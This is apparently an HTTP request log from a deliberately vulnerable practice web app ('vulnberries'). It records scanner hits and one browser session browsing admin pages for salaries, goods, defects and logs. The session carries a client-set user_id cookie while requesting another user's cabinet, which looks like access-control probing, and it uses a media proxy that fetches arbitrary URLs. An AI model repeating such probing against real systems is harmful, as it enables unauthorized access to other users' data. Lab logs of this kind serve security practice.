[2026-03-04 18:38:34] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru/_next
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56114
Path: /_next
URL: /_next
Method: HEAD
[2026-03-04 18:35:03] === HTTP Request ===
[2026-03-04 18:35:02] Main page accessed - IP: 172.30.0.12:56114
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Referer: http://admin.vulnberries.ru
Range: bytes=0-2048
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56114
Path: /
URL: /
Method: GET
[2026-03-04 18:35:02] === HTTP Request ===
[2026-03-04 18:35:01] Main page accessed - IP: 172.30.0.12:56114
===================
Referer: http://admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56114
Path: /
URL: /
Method: HEAD
[2026-03-04 18:35:01] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 147.185.132.183:63656
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-04 18:21:46] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 198.235.24.94:58526
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-04 18:18:31] === HTTP Request ===
[2026-03-04 18:11:15] Salary page accessed - IP: 172.30.0.12:39706
===================
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/cabinet?user=20
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /salary
URL: /salary
Method: GET
[2026-03-04 18:11:15] === HTTP Request ===
[2026-03-04 18:11:11] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-03-04 18:11:11] === HTTP Request ===
[2026-03-04 18:11:04] Login page accessed - IP: 172.30.0.12:39706
===================
Sec-Fetch-Dest: document
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/salary
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.206
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /login
URL: /login
Method: GET
[2026-03-04 18:11:04] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Proto: https
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/salary
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-04 18:09:41] === HTTP Request ===
[2026-03-04 18:09:41] Salary page accessed - IP: 172.30.0.12:39706
===================
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/goods
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /salary
URL: /salary
Method: GET
[2026-03-04 18:09:41] === HTTP Request ===
[2026-03-04 18:09:31] Goods page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /goods
URL: /goods
Method: GET
[2026-03-04 18:09:31] === HTTP Request ===
[2026-03-04 18:09:23] Main page accessed - IP: 172.30.0.12:39706
===================
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/goods
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Priority: u=1, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Dest: empty
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:09:23] === HTTP Request ===
===================
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: no-cors
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/goods
Sec-Fetch-Site: same-origin
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-03-04 18:08:50] === HTTP Request ===
[2026-03-04 18:08:50] Goods page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-For: 45.85.105.206
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/logs
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /goods
URL: /goods
Method: GET
[2026-03-04 18:08:50] === HTTP Request ===
[2026-03-04 18:08:45] Logs page accessed - IP: 172.30.0.12:39706
===================
Priority: u=1, i
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/logs
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /logs
URL: /logs
Method: GET
[2026-03-04 18:08:45] === HTTP Request ===
[2026-03-04 18:08:44] Logs page accessed - IP: 172.30.0.12:39706
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/logs
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Accept: */*
X-Forwarded-For: 45.85.105.206
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /logs
URL: /logs
Method: GET
[2026-03-04 18:08:44] === HTTP Request ===
[2026-03-04 18:08:43] Logs page accessed - IP: 172.30.0.12:39706
===================
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/logs
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /logs
URL: /logs
Method: GET
[2026-03-04 18:08:43] === HTTP Request ===
[2026-03-04 18:08:39] Logs page accessed - IP: 172.30.0.12:39706
===================
Sec-Fetch-Site: same-origin
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /logs
URL: /logs
Method: GET
[2026-03-04 18:08:39] === HTTP Request ===
[2026-03-04 18:08:38] Main page accessed - IP: 172.30.0.12:39706
===================
Referer: https://admin.vulnberries.ru/defects
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:08:38] === HTTP Request ===
[2026-03-04 18:08:19] Defects page accessed - IP: 172.30.0.12:39706
===================
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects
URL: /defects
Method: GET
[2026-03-04 18:08:19] === HTTP Request ===
[2026-03-04 18:08:18] Main page accessed - IP: 172.30.0.12:39706
===================
Accept: */*
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/logs
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:08:18] === HTTP Request ===
[2026-03-04 18:08:12] Logs page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Referer: https://admin.vulnberries.ru/defects/785906f2-e801-4f17-9faf-81aec59d21e3
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /logs
URL: /logs
Method: GET
[2026-03-04 18:08:12] === HTTP Request ===
[2026-03-04 18:07:34] Media proxy request - url: https://media.vulnberries.ru/media?filename=8, IP: 172.30.0.12:39706
===================
Referer: https://admin.vulnberries.ru/defects/785906f2-e801-4f17-9faf-81aec59d21e3
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D8
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D8
Method: GET
[2026-03-04 18:07:34] === HTTP Request ===
[2026-03-04 18:07:34] Defect detail page accessed - defect_id: 785906f2-e801-4f17-9faf-81aec59d21e3, IP: 172.30.0.12:39706
===================
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=1, i
Accept: */*
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/defects
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects/785906f2-e801-4f17-9faf-81aec59d21e3
URL: /defects/785906f2-e801-4f17-9faf-81aec59d21e3
Method: GET
[2026-03-04 18:07:34] === HTTP Request ===
[2026-03-04 18:07:33] Defects page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects
URL: /defects
Method: GET
[2026-03-04 18:07:33] === HTTP Request ===
[2026-03-04 18:07:19] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:39706
===================
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
Referer: https://admin.vulnberries.ru/defects
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-04 18:07:19] === HTTP Request ===
[2026-03-04 18:07:17] Defects page accessed - IP: 172.30.0.12:39706
===================
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/681a7a29-68b5-4c85-b15c-8b8462683d26
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1772646490453422354; user_id=7
Sec-Fetch-Site: same-origin
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects
URL: /defects
Method: GET
[2026-03-04 18:07:17] === HTTP Request ===
[2026-03-04 18:07:10] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:46332
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Priority: i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: image
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/defects/681a7a29-68b5-4c85-b15c-8b8462683d26
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46332
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-04 18:07:10] === HTTP Request ===
[2026-03-04 18:07:10] Media proxy request - url: https://media.vulnberries.ru/media?filename=2, IP: 172.30.0.12:39706
===================
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
